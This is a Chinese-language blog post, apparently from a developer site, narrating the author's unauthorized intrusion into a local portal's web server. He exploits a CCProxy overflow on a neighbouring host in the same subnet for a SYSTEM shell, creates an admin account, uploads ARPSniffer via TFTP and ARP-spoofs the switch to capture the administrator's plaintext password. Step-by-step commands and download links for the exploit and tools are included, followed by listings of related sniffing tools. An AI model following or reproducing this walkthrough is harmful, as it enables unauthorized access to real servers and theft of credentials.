`
zpball
  • 浏览: 919513 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

巧用嗅探 玩“渗透”

阅读更多
  还记得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章吗?自从上次入侵之后,网站的管理员想尽了办法堵住了所有SQL注入漏洞,想通过SQL注入后台管理页面已经没有可能了。真是郁闷,但是转念一想,这正是一个练习技术的好机会,难道除了简单的工具利用外,我就没有其它的办法了吗?一定要想法子再次拿下这个站点。

 一、扫描,突现新曙光
 想来想去找不到什么好的办法,闲着也无事,于是习惯性的用X-scan扫描了一下与本地信息港(203.207.***.2)位于同一C段的IP地址。结果在扫描到的结果中发现有许多存活主机,而且其中有一些主机好像还有系统漏洞可以利用。唉,只可惜这些主机都不是我要进攻的目标!
面对扫描出来的结果发了好久的呆,突然大脑中灵光一闪冒出了一个念头:这些网站中说不定有某个与信息港位于同一个交换机内呢!如果我能进入控制与信息港位于同一交换机下的站点,就可以利用小榕哥的另外一个工具ARPSniffer.EXE,监听信息港站点中的一举一动,如果能嗅探到通过80端口传输到信息港的网站管理员密码,不就成功地搞定信息港了吗?看来方案可行!于是我开始了又一轮攻击。

 二、利用溢出漏洞拿下第一站
 在扫描到的C段IP地址中试验了几个站点,第一个站点居然还有SA空口令的漏洞,可惜连接上去后发现与信息港并不在同一个交换机下。另一个站点存在Serv-U溢出漏洞,可惜也无法利用。剩下的其它网站好像看不出有什么问题来,只有一个网站(203.207.***.44)有些奇怪,在端口扫描结果中发现它好像开放了“TCP 808”端口。也不知道这个奇怪的端口是拿来做什么的(如图1)?

图1


于是上Google搜索了一下,呵呵,这下收获可大了!从搜索结果了解到,原来808端口是网站中一个叫作CCProxy的软件打开的。CCProxy是国内一个常用的代理服务器软件,它可以轻松建立各种代理服务器,国内的许多企业都使用它代理上网,记得当初我还用它将一台肉鸡建成了一个全能的代理服务器,怎么就给忘记了呢?恰巧被扫描的网站也是一个企业站点,看来这个网站的808端口十有八九是CCProxy打开的啦。最重要的是从网上还了解到这个CCProxy代理服务器软件刚发现了一个最新的远程漏洞,于是赶紧下载了一个溢出程序试试(下载地址:ttp://www.nuoya.org/down/soft/CCProxy.rar)。
 (小提示:CCProxy打开的端口可能还有1080、2121等,这些是用来提供Socks和FTP服务的。)

 CCProxy溢出程序的使用非常简单,在命令窗口中输入“ccpx 目标IP地址 端口”,然后按提示操作即可(如图2)。在溢出中会询问本机是与攻击目标位于同一个IP段;如果是在同一IP地址段中的话,直接按“y”,就可以开始溢出了;如果本机与攻击目标不在一个IP地址段中的话,按下“n”,溢出程序将继续提示并询问本机是否有一个公网IP地址(如图3),如果没有的话,还需要手工输入自己的网关IP地址才可以开始溢出。溢出成功后,会在当前命令窗口中自动连接攻击目标的24876端口,获得远程主机的一个SYSTEM Shell。剩下来的事就是建立管理员帐号,常常的掌握这台肉机。

图2





图3




三、上传嗅探利器ARPSniffer
 现在要通过手里的肉鸡入侵信息港了。首先还是要查看一下两个网站服务器是不是位于同一个交换机下。远程连接肉机,在肉鸡的CMD窗口中输入命令“tracert 攻击目标IP地址”,令人兴奋的是看到直接返回了目标IP地址(如图4),现在可以确定两台主机都在同一交换机下了,看来有戏啦!可以考虑用嗅探的方法从肉鸡上获取信息港的管理员密码或者其它有用的信息。现在要用到的是一个名叫“ARPSniffer.exe”的软件(下载地址:http://admin.cnxhacker.net/Soft/uploadsoft/200409/arpsniffer.rar)。这个软件有DOS版和WIN版,RPSniffer也是小榕哥开发的一款工具非常好的嗅探工具,它可以用在交换机的环境下。在使用这个嗅探工具前首先要使用机器上安装WinPCAP驱动。怎么上传ARPSniffer到肉鸡上?还是老方法用TFTP传送。在本机上运行Tfpd32,将本机建成为一个TFTP服务器,点击界面中的“Browse”按钮,选择ARPSniffer下载压缩包的解压路径(如图5),然后在肉鸡的命令窗口中运行“Get -i TFTP服务器IP地址 文件名”即可。在这里下载后的压缩包中有两个版本的程序,我们只需要上传“arpsniffer.exe”和“WinPcap_3_0_a.exe”即可。上传成功后先运行“WinPcap_3_0_a.exe”安装嗅探驱动程序。


图4





图5



四、利用ARPSniffer渗透攻击真正目标
 现在是万事具备,只欠嗅探。先在命令窗口中运行“Ipconfig /all”命令,查看一下肉鸡上的网址配置情况和网关IP地址(如图6)。可以查到网关(Default Gateway)为“203.207.***.1”,运行ARPSniffer命令:
“Arpsniffer203.207.***.1203.207.***.280 c:/password.txt”;
即可开始在肉鸡上监听攻击目标IP的80端口了(如图7)。攻击目标IP上所有通过80端口收发的密码将被保存在“Password.txt”文件中。在嗅探时需要注意,如果在肉鸡上安装有两块网卡的话,还要在刚才的Arpsniffer命令后加上数字参数指定嗅探的网卡ID。

图6






图7




(小提示:当然我们也可以嗅探其它的端口,如21和25端口等获得Telnet密码。但是由于管理员以Web方式登录的几率较大些,所以我们选择了嗅探80Web端口。)

 五、获得管理员密码
 最后剩下来的事情就是坐着等待攻击目标网站上的管理员登录了。很快就看到了肉鸡上的命令窗口中有了反应,打开“password.txt”就可以看到密码。不过由于我们还在监听过程中,所以“password.txt”文件是无法直接打开的,而且也不能复制。想要查看密码记录文件,必须先终止嗅探进程。可以在肉鸡嗅探窗口中直接按下“Ctrl+C”键,就可以中止嗅探了。不过可能同时也会将我们在本机与肉鸡建立的连接窗口关闭掉了。结束后看一看,呵呵,真的有收获啦,网站管理的密码都以明文的方式保存在文本里面啦!现在还等什么呢?又可以以管理员身份登入信息港故地重游啦!

  • 大小: 47.7 KB
  • 大小: 28.4 KB
  • 大小: 25.1 KB
  • 大小: 18.5 KB
  • 大小: 24.1 KB
  • 大小: 36.9 KB
  • 大小: 45.2 KB
分享到:
评论

相关推荐

    arp嗅探相关渗透测试软件

    本文将深入探讨“arp嗅探相关渗透测试软件”,并介绍相关的知识点。 ARP(Address Resolution Protocol,地址解析协议)是网络层的一个关键协议,它允许设备通过IP地址查找对应的MAC(Media Access Control)物理...

    Linux下渗透嗅探术

    ### Linux下渗透嗅探术详解 #### 一、引言 在网络安全领域,渗透测试是一项重要的技能,旨在评估网络和系统的安全性。其中,Linux环境下的渗透嗅探技术尤为关键,它帮助安全专家深入理解网络内部结构,识别潜在的...

    一款小巧的嗅探工具snifferpro

    9. **隐私与合规性**:使用嗅探工具必须遵守相关法律法规,确保在合法授权下进行,不得滥用,否则可能面临法律风险。 10. **教育与研究**:Sniffer Pro也是教育和研究领域的重要工具,用于教学网络原理、安全课程...

    网络安全网络嗅探工具.zip

    网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探工具.zip网络嗅探...

    n900使用ettercap嗅探局域网内数据流动

    "n900使用ettercap嗅探局域网内数据流动" ettercap是一个强大的网络嗅探工具,能够嗅探局域网内的数据流动。下面是使用n900设备嗅探局域网内数据流动的知识点: 1. ettercap的安装和配置:ettercap是一个开源的...

    网络嗅探器~~!网络嗅探器

    - **开发调试**:开发者可以用嗅探器来跟踪应用程序与服务器之间的通信,辅助调试网络相关的代码问题。 在文件"wlxtq_4.73"中,可能包含了一个名为"网络嗅探器"的软件版本4.73的相关资料。这个版本可能提供了新的...

    chrome资源嗅探扩展

    "Chrome资源嗅探扩展",通常被称为"猫抓",是一种强大的浏览器插件,专为开发者和网络研究人员设计。这款工具允许用户在Chrome浏览器中轻松地捕获、查看和分析网页上的各种网络资源,包括HTML、CSS、JavaScript、...

    文件嗅探器-很小巧的数据恢复工具

    以下将详细介绍文件嗅探器的工作原理、使用方法以及数据恢复的相关知识。 1. 文件系统与数据存储原理 在计算机中,文件是存储在硬盘或固态驱动器等存储设备上的数据集合。文件系统如FAT、NTFS或EXT等负责管理和组织...

    VC++编程实现网络嗅探器.zip_Vc_嗅探器_监测_网络嗅探_网络监测

    标题 "VC++编程实现网络嗅探器.zip" 暗示了这个压缩包包含了一个使用Visual C++(VC++)编写的程序,该程序旨在实现网络嗅探功能。网络嗅探器是一种工具,用于捕获并分析网络上的数据包,这对于网络监控、故障排查和...

    影音嗅探专家V6.0

    "影音嗅探专家V6.0"是一款专为网络媒体爱好者设计的强大工具,它能够有效地帮助用户找到并...然而,值得注意的是,任何嗅探工具的使用都应遵守网络道德和法律法规,尊重他人的版权和隐私,避免滥用技术进行非法活动。

    SNIff嗅探工具

    ettercap是一款功能强大的网络嗅探和欺骗工具,它不仅可以捕获数据包,还可以进行中间人攻击(Man-in-the-Middle,MITM),这使得ettercap在网络安全测试和渗透测试中十分有用。 在【压缩包子文件的文件名称列表】...

    网络资源嗅探器

    在本文中,我们将深入探讨嗅探器的工作原理、应用领域以及如何使用像SnifferTools这样的工具。 首先,我们要理解什么是嗅探器。嗅探器,又称为网络分析器或数据包分析器,是一种软件程序,它能够实时地捕获通过网络...

    谷歌资源嗅探插件谷歌资源嗅探插件

    谷歌资源嗅探插件

    影音嗅探基于qt

    【影音嗅探基于qt】是一种使用Qt框架开发的多媒体数据包捕获技术,它整合了pthread for Win32和Winpcap库,旨在高效、便捷地监控和分析网络中的视频和音频流。Qt是一个跨平台的C++图形用户界面应用程序开发框架,...

    sniffer嗅探器C++

    本项目"sniffer嗅探器C++"是用C++编程语言实现的一个网络嗅探器,专门用于探测网络数据包。 在C++中实现嗅探器,我们需要利用一些底层的网络编程接口,如Berkeley套接字API(BSD Sockets)。以下是一些关键的知识点...

    简单的网络嗅探器

    网络嗅探器是一种用于监测和分析网络通信的强大工具。它能捕获并解析网络上的数据包,帮助我们...然而,使用嗅探器时需注意,未经许可的网络监听可能涉及侵犯隐私和违反法规,因此在实际操作中必须遵循相关法律法规。

    xsniff DOS嗅探器

    **xsniff DOS嗅探器**是一款专为Windows操作系统,特别是Windows 7设计的数据包嗅探工具。在信息技术领域,嗅探器是一种网络诊断和分析工具,它允许用户捕获和查看网络上的数据包,这对于网络管理员、安全专家以及...

    flvdownloader网页视频地址嗅探器 网页流媒体地址嗅探器

    一旦找到,嗅探器就会显示这个链接,用户可以直接下载或使用其他工具进行处理。 在描述中提到的“网页流媒体地址嗅探”,这个概念更广泛,不仅限于FLV格式。现在的网页视频流媒体格式多样,如MP4、HLS...

    网络嗅探程序源码

    因此,在使用或开发嗅探工具时,必须遵守相关法律法规,尊重网络用户的隐私。 总结,网络嗅探源码的学习涵盖了网络协议、数据包捕获、协议解析等多个方面,对于深入理解网络通信和提升网络安全技能具有重要意义。...

    Proxmark 3离线嗅探详细教程及工具

    3. **启动嗅探**:使用`hunt`命令开始嗅探附近的RFID信号。此过程中,设备会捕获到所有在工作频段内发射的信号。 4. **数据记录**:当捕获到目标信号时,Proxmark 3会记录下相关信息,如RFID标签ID、传输数据等。...

Global site tag (gtag.js) - Google Analytics